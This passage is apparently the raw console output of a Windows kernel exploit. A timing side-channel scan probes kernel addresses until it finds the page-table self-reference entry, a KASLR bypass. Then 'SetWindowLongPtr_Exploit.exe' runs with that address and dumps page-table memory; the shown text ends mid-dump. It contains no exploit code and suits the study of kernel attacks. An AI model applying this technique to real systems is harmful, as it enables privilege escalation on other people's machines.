looks mapped! - Time: 206.883759 +] PTE FFFF82010719CF00 looks mapped! - Time: 208.451019 +] PTE FFFF82010719CF80 looks mapped! - Time: 201.073364 +] PTE FFFF82010719D000 looks mapped! - Time: 203.052826 +] PTE FFFF82010719D080 looks mapped! - Time: 194.115143 +] PTE FFFF820804020100 looks mapped! - Time: 198.158585 PML4e: FFFF8140A0502810 - Index: 102 PML4e: FFFF824120904820 - Index: 104 PML4e: FFFF8341A0D06830 - Index: 106 PML4e: FFFF83C1E0F07838 - Index: 107 KNOWN_UNMAPPED PTE: ffff820000000000 -] Erasing 104 from final array Potential SelfRef: FFFF8341A0D06830 +] PTE FFFF83010719CE80 looks mapped! - Time: 200.405823 +] PTE FFFF83010719CF00 looks mapped! - Time: 201.572525 +] PTE FFFF83010719CF80 looks mapped! - Time: 193.538040 +] PTE FFFF83010719D000 looks mapped! - Time: 196.066254 +] PTE FFFF83010719D080 looks mapped! - Time: 189.007034 +] PTE FFFF830804020100 looks mapped! - Time: 197.613953 PML4e: FFFF8140A0502810 - Index: 102 PML4e: FFFF8341A0D06830 - Index: 106 PML4e: FFFF83C1E0F07838 - Index: 107 KNOWN_UNMAPPED PTE: ffff830000000000 -] Erasing 106 from final array Potential SelfRef: FFFF83C1E0F07838 +] PTE FFFF83810719CE80 looks mapped! - Time: 200.655380 Time difference exceed for ffff83810719cf00, retrying... Time difference exceed for ffff83810719cf00, retrying... Unmapped Initial: 232.123840 Mapped Initial: 196.420654 -------------------------- +] Measures are not consistent yet... +] Measures are not consistent yet... +] Measures are not consistent yet... +] Measures are not consistent yet... +] Measures are not consistent yet... -------------------------- Unmapped: 234.845581 Mapped: 187.862518 -------------------------- Potential SelfRef: FFFF8140A0502810 +] PTE FFFF81010719CE80 looks mapped! - Time: 197.432938 +] PTE FFFF81010719CF00 looks mapped! - Time: 191.731766 Time difference exceed for ffff81010719cf80, retrying... Time difference exceed for ffff81010719cf80, retrying... Time difference exceed for ffff81010719cf80, retrying... +] PTE FFFF81010719CF80 looks mapped! - Time: 201.003784 +] PTE FFFF81010719D000 looks mapped! - Time: 194.332733 +] PTE FFFF81010719D080 looks mapped! - Time: 200.211182 +] PTE FFFF810804020100 looks mapped! - Time: 199.812225 PML4e: FFFF8140A0502810 - Index: 102 PML4e: FFFF83C1E0F07838 - Index: 107 KNOWN_UNMAPPED PTE: ffff810000000000 Time difference exceed for ffff810000000000, retrying... -] Erasing 102 from final array Time difference exceed for ffff83c1e0f07838, retrying... Potential SelfRef: FFFF83C1E0F07838 Time difference exceed for ffff83810719ce80, retrying... Time difference exceed for ffff83810719ce80, retrying... Unmapped Initial: 230.247162 Mapped Initial: 198.023987 -------------------------- +] Measures are not consistent yet... +] Measures are not consistent yet... +] Measures are not consistent yet... +] Measures are not consistent yet... +] Measures are not consistent yet... -------------------------- Unmapped: 235.923035 Mapped: 191.605301 -------------------------- Time difference exceed for ffff83c1e0f07838, retrying... Time difference exceed for ffff83c1e0f07838, retrying... Potential SelfRef: FFFF83C1E0F07838 Time difference exceed for ffff83810719ce80, retrying... Time difference exceed for ffff83810719ce80, retrying... Time difference exceed for ffff83810719ce80, retrying... Time difference exceed for ffff83810719ce80, retrying... Time difference exceed for ffff83810719ce80, retrying... Unmapped Initial: 258.041046 Mapped Initial: 210.309753 -------------------------- +] Measures are not consistent yet... +] Measures are not consistent yet... +] Measures are not consistent yet... +] Measures are not consistent yet... +] Measures are not consistent yet... -------------------------- Unmapped: 238.757538 Mapped: 203.896240 -------------------------- Potential SelfRef: FFFF83C1E0F07838 +] PTE FFFF83810719CE80 looks mapped! - Time: 210.036102 +] PTE FFFF83810719CF00 looks mapped! - Time: 199.200836 +] PTE FFFF83810719CF80 looks mapped! - Time: 204.575333 +] PTE FFFF83810719D000 looks mapped! - Time: 197.218445 +] PTE FFFF83810719D080 looks mapped! - Time: 203.334763 +] PTE FFFF838804020100 looks mapped! - Time: 203.243607 PML4e: FFFF83C1E0F07838 - Index: 107 KNOWN_UNMAPPED PTE: ffff838000000000 -] Erasing 107 from final array Potential SelfRef: FFFF82C160B05828 +] PTE FFFF82810719CE80 looks mapped! - Time: 201.889221 +] PTE FFFF82810719CF00 looks mapped! - Time: 201.679138 +] PTE FFFF82810719CF80 looks mapped! - Time: 204.281006 +] PTE FFFF82810719D000 looks mapped! - Time: 209.909943 +] PTE FFFF82810719D080 looks mapped! - Time: 202.795639 +] PTE FFFF828804020100 looks mapped! - Time: 196.754044 +] Removing 105 from initial array and pushing it into final array Time difference exceed for ffff884422110880, retrying... Time difference exceed for ffff884422110880, retrying... Time difference exceed for ffff8ec763b1d8e8, retrying... Time difference exceed for ffff8ec763b1d8e8, retrying... Time difference exceed for ffff8ec763b1d8e8, retrying... Time difference exceed for ffff8ec763b1d8e8, retrying... Time difference exceed for ffff90c864321908, retrying... Unmapped Initial: 257.754272 Mapped Initial: 207.903702 -------------------------- +] Measures are not consistent yet... +] Measures are not consistent yet... +] Measures are not consistent yet... +] Measures are not consistent yet... +] Measures are not consistent yet... -------------------------- Unmapped: 247.145935 Mapped: 207.792923 -------------------------- Potential SelfRef: FFFF82C160B05828 +] PTE FFFF82810719CE80 looks mapped! - Time: 208.554092 +] PTE FFFF82810719CF00 looks mapped! - Time: 206.517715 +] PTE FFFF82810719CF80 looks mapped! - Time: 216.576614 +] PTE FFFF82810719D000 looks mapped! - Time: 213.698837 +] PTE FFFF82810719D080 looks mapped! - Time: 210.162796 +] PTE FFFF828804020100 looks mapped! - Time: 208.765045 PML4e: FFFF82C160B05828 - Index: 105 KNOWN_UNMAPPED PTE: ffff828000000000 -] Erasing 105 from final array -] Removing 100 as it seems to be unmapped -] Removing 101 as it seems to be unmapped -] Removing 108 as it seems to be unmapped -] Removing 109 as it seems to be unmapped -] Removing 10a as it seems to be unmapped -] Removing 10b as it seems to be unmapped -] Removing 10c as it seems to be unmapped -] Removing 10d as it seems to be unmapped Time difference exceed for ffff8743a1d0e870, retrying... -] Removing 10e as it seems to be unmapped -] Removing 10f as it seems to be unmapped -] Removing 110 as it seems to be unmapped Time difference exceed for ffff88c462311888, retrying... -] Removing 111 as it seems to be unmapped -] Removing 112 as it seems to be unmapped -] Removing 113 as it seems to be unmapped Time difference exceed for ffff8a45229148a0, retrying... -] Removing 114 as it seems to be unmapped -] Removing 115 as it seems to be unmapped -] Removing 116 as it seems to be unmapped -] Removing 117 as it seems to be unmapped Time difference exceed for ffffbc5e2f178bc0, retrying... Time difference exceed for ffffbc5e2f178bc0, retrying... Time difference exceed for ffffe8f47a3d1e88, retrying... Potential SelfRef: FFFFF67B3D9ECF60 +] PTE FFFFF6010719CE80 looks mapped! - Time: 201.963379 +] PTE FFFFF6010719CF00 looks mapped! - Time: 212.917694 +] PTE FFFFF6010719CF80 looks mapped! - Time: 207.448502 +] PTE FFFFF6010719D000 looks mapped! - Time: 203.673920 +] PTE FFFFF6010719D080 looks mapped! - Time: 206.782059 +] PTE FFFFF60804020100 looks mapped! - Time: 211.636246 +] Removing 1ec from initial array and pushing it into final array Unmapped Initial: 233.678802 Mapped Initial: 214.496124 -------------------------- +] Measures are not consistent yet... +] Measures are not consistent yet... +] Measures are not consistent yet... +] Measures are not consistent yet... +] Measures are not consistent yet... +] Measures are not consistent yet... -------------------------- Unmapped: 250.585373 Mapped: 213.339661 -------------------------- Potential SelfRef: FFFFF67B3D9ECF60 +] PTE FFFFF6010719CE80 looks mapped! - Time: 201.419174 +] PTE FFFFF6010719CF00 looks mapped! - Time: 199.196457 +] PTE FFFFF6010719CF80 looks mapped! - Time: 210.779861 +] PTE FFFFF6010719D000 looks mapped! - Time: 199.642334 +] PTE FFFFF6010719D080 looks mapped! - Time: 200.348160 +] PTE FFFFF60804020100 looks mapped! - Time: 204.036926 PML4e: FFFFF67B3D9ECF60 - Index: 1ec KNOWN_UNMAPPED PTE: fffff60000000000 Real PML4 SelfRef Found: fffff67b3d9ecf60 Left in Potential Array: ffff8c46231188c0 Left in Potential Array: ffff8cc6633198c8 Left in Potential Array: ffff8d46a351a8d0 Left in Potential Array: ffff8dc6e371b8d8 Left in Potential Array: ffff8e472391c8e0 Left in Potential Array: ffff8ec763b1d8e8 Left in Potential Array: ffff8f47a3d1e8f0 Left in Potential Array: ffff8fc7e3f1f8f8 Left in Potential Array: ffff904824120900 Left in Potential Array: ffff90c864321908 Left in Potential Array: ffff9148a4522910 Left in Potential Array: ffff91c8e4723918 Left in Potential Array: ffff924924924920 Left in Potential Array: ffff92c964b25928 Left in Potential Array: ffff9349a4d26930 Left in Potential Array: ffff93c9e4f27938 Left in Potential Array: ffff944a25128940 Left in Potential Array: ffff94ca65329948 Left in Potential Array: ffff954aa552a950 Left in Potential Array: ffff95cae572b958 Left in Potential Array: ffff964b2592c960 Left in Potential Array: ffff96cb65b2d968 Left in Potential Array: ffff974ba5d2e970 Left in Potential Array: ffff97cbe5f2f978 Left in Potential Array: ffff984c26130980 Left in Potential Array: ffff98cc66331988 Left in Potential Array: ffff994ca6532990 Left in Potential Array: ffff99cce6733998 Left in Potential Array: ffff9a4d269349a0 Left in Potential Array: ffff9acd66b359a8 Left in Potential Array: ffff9b4da6d369b0 Left in Potential Array: ffff9bcde6f379b8 Left in Potential Array: ffff9c4e271389c0 Left in Potential Array: ffff9cce673399c8 Left in Potential Array: ffff9d4ea753a9d0 Left in Potential Array: ffff9dcee773b9d8 Left in Potential Array: ffff9e4f2793c9e0 Left in Potential Array: ffff9ecf67b3d9e8 Left in Potential Array: ffff9f4fa7d3e9f0 Left in Potential Array: ffff9fcfe7f3f9f8 Left in Potential Array: ffffa05028140a00 Left in Potential Array: ffffa0d068341a08 Left in Potential Array: ffffa150a8542a10 Left in Potential Array: ffffa1d0e8743a18 Left in Potential Array: ffffa25128944a20 Left in Potential Array: ffffa2d168b45a28 Left in Potential Array: ffffa351a8d46a30 Left in Potential Array: ffffa3d1e8f47a38 Left in Potential Array: ffffa45229148a40 Left in Potential Array: ffffa4d269349a48 Left in Potential Array: ffffa552a954aa50 Left in Potential Array: ffffa5d2e974ba58 Left in Potential Array: ffffa6532994ca60 Left in Potential Array: ffffa6d369b4da68 Left in Potential Array: ffffa753a9d4ea70 Left in Potential Array: ffffa7d3e9f4fa78 Left in Potential Array: ffffa8542a150a80 Left in Potential Array: ffffa8d46a351a88 Left in Potential Array: ffffa954aa552a90 Left in Potential Array: ffffa9d4ea753a98 Left in Potential Array: ffffaa552a954aa0 Left in Potential Array: ffffaad56ab55aa8 Left in Potential Array: ffffab55aad56ab0 Left in Potential Array: ffffabd5eaf57ab8 Left in Potential Array: ffffac562b158ac0 Left in Potential Array: ffffacd66b359ac8 Left in Potential Array: ffffad56ab55aad0 Left in Potential Array: ffffadd6eb75bad8 Left in Potential Array: ffffae572b95cae0 Left in Potential Array: ffffaed76bb5dae8 Left in Potential Array: ffffaf57abd5eaf0 Left in Potential Array: ffffafd7ebf5faf8 Left in Potential Array: ffffb0582c160b00 Left in Potential Array: ffffb0d86c361b08 Left in Potential Array: ffffb158ac562b10 Left in Potential Array: ffffb1d8ec763b18 Left in Potential Array: ffffb2592c964b20 Left in Potential Array: ffffb2d96cb65b28 Left in Potential Array: ffffb359acd66b30 Left in Potential Array: ffffb3d9ecf67b38 Left in Potential Array: ffffb45a2d168b40 Left in Potential Array: ffffb4da6d369b48 Left in Potential Array: ffffb55aad56ab50 Left in Potential Array: ffffb5daed76bb58 Left in Potential Array: ffffb65b2d96cb60 Left in Potential Array: ffffb6db6db6db68 Left in Potential Array: ffffb75badd6eb70 Left in Potential Array: ffffb7dbedf6fb78 Left in Potential Array: ffffb85c2e170b80 Left in Potential Array: ffffb8dc6e371b88 Left in Potential Array: ffffb95cae572b90 Left in Potential Array: ffffb9dcee773b98 Left in Potential Array: ffffba5d2e974ba0 Left in Potential Array: ffffbadd6eb75ba8 Left in Potential Array: ffffbb5daed76bb0 Left in Potential Array: ffffbbddeef77bb8 Left in Potential Array: ffffbc5e2f178bc0 Left in Potential Array: ffffbcde6f379bc8 Left in Potential Array: ffffbd5eaf57abd0 Left in Potential Array: ffffbddeef77bbd8 Left in Potential Array: ffffbe5f2f97cbe0 Left in Potential Array: ffffbedf6fb7dbe8 Left in Potential Array: ffffbf5fafd7ebf0 Left in Potential Array: ffffbfdfeff7fbf8 Left in Potential Array: ffffc06030180c00 Left in Potential Array: ffffc0e070381c08 Left in Potential Array: ffffc160b0582c10 Left in Potential Array: ffffc1e0f0783c18 Left in Potential Array: ffffc26130984c20 Left in Potential Array: ffffc2e170b85c28 Left in Potential Array: ffffc361b0d86c30 Left in Potential Array: ffffc3e1f0f87c38 Left in Potential Array: ffffc46231188c40 Left in Potential Array: ffffc4e271389c48 Left in Potential Array: ffffc562b158ac50 Left in Potential Array: ffffc5e2f178bc58 Left in Potential Array: ffffc6633198cc60 Left in Potential Array: ffffc6e371b8dc68 Left in Potential Array: ffffc763b1d8ec70 Left in Potential Array: ffffc7e3f1f8fc78 Left in Potential Array: ffffc86432190c80 Left in Potential Array: ffffc8e472391c88 Left in Potential Array: ffffc964b2592c90 Left in Potential Array: ffffc9e4f2793c98 Left in Potential Array: ffffca6532994ca0 Left in Potential Array: ffffcae572b95ca8 Left in Potential Array: ffffcb65b2d96cb0 Left in Potential Array: ffffcbe5f2f97cb8 Left in Potential Array: ffffcc6633198cc0 Left in Potential Array: ffffcce673399cc8 Left in Potential Array: ffffcd66b359acd0 Left in Potential Array: ffffcde6f379bcd8 Left in Potential Array: ffffce673399cce0 Left in Potential Array: ffffcee773b9dce8 Left in Potential Array: ffffcf67b3d9ecf0 Left in Potential Array: ffffcfe7f3f9fcf8 Left in Potential Array: ffffd068341a0d00 Left in Potential Array: ffffd0e8743a1d08 Left in Potential Array: ffffd168b45a2d10 Left in Potential Array: ffffd1e8f47a3d18 Left in Potential Array: ffffd269349a4d20 Left in Potential Array: ffffd2e974ba5d28 Left in Potential Array: ffffd369b4da6d30 Left in Potential Array: ffffd3e9f4fa7d38 Left in Potential Array: ffffd46a351a8d40 Left in Potential Array: ffffd4ea753a9d48 Left in Potential Array: ffffd56ab55aad50 Left in Potential Array: ffffd5eaf57abd58 Left in Potential Array: ffffd66b359acd60 Left in Potential Array: ffffd6eb75badd68 Left in Potential Array: ffffd76bb5daed70 Left in Potential Array: ffffd7ebf5fafd78 Left in Potential Array: ffffd86c361b0d80 Left in Potential Array: ffffd8ec763b1d88 Left in Potential Array: ffffd96cb65b2d90 Left in Potential Array: ffffd9ecf67b3d98 Left in Potential Array: ffffda6d369b4da0 Left in Potential Array: ffffdaed76bb5da8 Left in Potential Array: ffffdb6db6db6db0 Left in Potential Array: ffffdbedf6fb7db8 Left in Potential Array: ffffdc6e371b8dc0 Left in Potential Array: ffffdcee773b9dc8 Left in Potential Array: ffffdd6eb75badd0 Left in Potential Array: ffffddeef77bbdd8 Left in Potential Array: ffffde6f379bcde0 Left in Potential Array: ffffdeef77bbdde8 Left in Potential Array: ffffdf6fb7dbedf0 Left in Potential Array: ffffdfeff7fbfdf8 Left in Potential Array: ffffe070381c0e00 Left in Potential Array: ffffe0f0783c1e08 Left in Potential Array: ffffe170b85c2e10 Left in Potential Array: ffffe1f0f87c3e18 Left in Potential Array: ffffe271389c4e20 Left in Potential Array: ffffe2f178bc5e28 Left in Potential Array: ffffe371b8dc6e30 Left in Potential Array: ffffe3f1f8fc7e38 Left in Potential Array: ffffe472391c8e40 Left in Potential Array: ffffe4f2793c9e48 Left in Potential Array: ffffe572b95cae50 Left in Potential Array: ffffe5f2f97cbe58 Left in Potential Array: ffffe673399cce60 Left in Potential Array: ffffe6f379bcde68 Left in Potential Array: ffffe773b9dcee70 Left in Potential Array: ffffe7f3f9fcfe78 Left in Potential Array: ffffe8743a1d0e80 Left in Potential Array: ffffe8f47a3d1e88 Left in Potential Array: ffffe974ba5d2e90 Left in Potential Array: ffffe9f4fa7d3e98 Left in Potential Array: ffffea753a9d4ea0 Left in Potential Array: ffffeaf57abd5ea8 Left in Potential Array: ffffeb75badd6eb0 Left in Potential Array: ffffebf5fafd7eb8 Left in Potential Array: ffffec763b1d8ec0 Left in Potential Array: ffffecf67b3d9ec8 Left in Potential Array: ffffed76bb5daed0 Left in Potential Array: ffffedf6fb7dbed8 Left in Potential Array: ffffee773b9dcee0 Left in Potential Array: ffffeef77bbddee8 Left in Potential Array: ffffef77bbddeef0 Left in Potential Array: ffffeff7fbfdfef8 Left in Potential Array: fffff0783c1e0f00 Left in Potential Array: fffff0f87c3e1f08 Left in Potential Array: fffff178bc5e2f10 Left in Potential Array: fffff1f8fc7e3f18 Left in Potential Array: fffff2793c9e4f20 Left in Potential Array: fffff2f97cbe5f28 Left in Potential Array: fffff379bcde6f30 Left in Potential Array: fffff3f9fcfe7f38 Left in Potential Array: fffff47a3d1e8f40 Left in Potential Array: fffff4fa7d3e9f48 Left in Potential Array: fffff57abd5eaf50 Left in Potential Array: fffff5fafd7ebf58 Left in Potential Array: fffff6fb7dbedf68 Left in Potential Array: fffff77bbddeef70 Left in Potential Array: fffff7fbfdfeff78 Left in Potential Array: fffff87c3e1f0f80 Left in Potential Array: fffff8fc7e3f1f88 Left in Potential Array: fffff97cbe5f2f90 Left in Potential Array: fffff9fcfe7f3f98 Left in Potential Array: fffffa7d3e9f4fa0 Left in Potential Array: fffffafd7ebf5fa8 Left in Potential Array: fffffb7dbedf6fb0 Left in Potential Array: fffffbfdfeff7fb8 Left in Potential Array: fffffc7e3f1f8fc0 Left in Potential Array: fffffcfe7f3f9fc8 Left in Potential Array: fffffd7ebf5fafd0 Left in Potential Array: fffffdfeff7fbfd8 Left in Potential Array: fffffe7f3f9fcfe0 Left in Potential Array: fffffeff7fbfdfe8 Left in Potential Array: ffffff7fbfdfeff0 Left in Potential Array: fffffffffffffff8 Left in Final Array: fffff67b3d9ecf60 Result: fffff67b3d9ecf60 Run SetWindowLongPtr_Exploit.exe C:\Users\qa\Desktop>SetWindowLongPtr_Exploit.exe fffff67b3d9ecf60 My PID is: 6056 Current Username: qa PML4 Self Ref: FFFFF67B3D9ECF60 Enter to continue... Value Self Ref = 8000000100211867 000000003D9EC000 | 67 a8 e2 61 00 00 c0 02 67 d8 d8 6b 00 00 d0 00 | g..a....g..k.... 000000003D9EC010 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC020 | 67 68 81 08 01 00 90 01 00 00 00 00 00 00 00 00 | gh.............. 000000003D9EC030 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC040 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC050 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC060 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC070 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC080 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC090 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC0A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC0B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC0C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC0D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC0E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC0F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC100 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC110 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC120 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC130 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC140 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC150 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC160 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC170 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC180 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC190 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC1A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC1B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC1C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC1D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC1E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC1F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC200 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC210 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC220 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC230 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC240 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC250 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC260 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC270 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC280 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC290 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC2A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC2B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC2C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC2D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC2E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC2F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC300 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC310 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC320 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC330 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC340 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC350 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC360 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC370 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC380 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC390 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC3A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC3B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC3C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC3D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC3E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC3F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC400 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC410 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC420 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC430 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC440 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC450 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC460 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC470 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC480 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC490 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC4A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC4B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC4C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC4D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC4E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC4F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC500 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC510 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC520 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC530 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC540 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC550 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC560 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC570 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC580 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC590 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC5A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC5B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC5C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC5D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC5E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC5F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC600 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC610 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC620 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC630 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC640 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC650 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC660 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC670 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC680 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC690 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC6A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC6B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC6C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC6D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC6E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC6F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC700 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC710 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC720 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC730 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC740 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC750 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC760 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC770 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 